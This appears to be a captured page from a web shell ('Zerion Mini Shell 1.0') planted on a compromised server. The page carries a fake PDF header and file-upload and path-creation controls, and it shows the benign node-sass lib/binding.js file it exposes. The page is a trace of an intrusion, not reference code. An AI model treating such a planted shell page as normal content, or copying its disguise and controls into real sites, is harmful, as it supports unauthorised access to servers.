%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/1857783/task/1857783/root/usr/local/lib/node_modules/node-sass/lib/
Upload File :
Create Path :
Current File : //proc/1857783/task/1857783/root/usr/local/lib/node_modules/node-sass/lib/binding.js

/*!
 * node-sass: lib/binding.js
 */

var errors = require('./errors');

/**
 * Require binding
 */
module.exports = function(ext) {
  if (!ext.hasBinary(ext.getBinaryPath())) {
    if (!ext.isSupportedEnvironment()) {
      throw new Error(errors.unsupportedEnvironment());
    } else {
      throw new Error(errors.missingBinary());
    }
  }

  return require(ext.getBinaryPath());
};

Zerion Mini Shell 1.0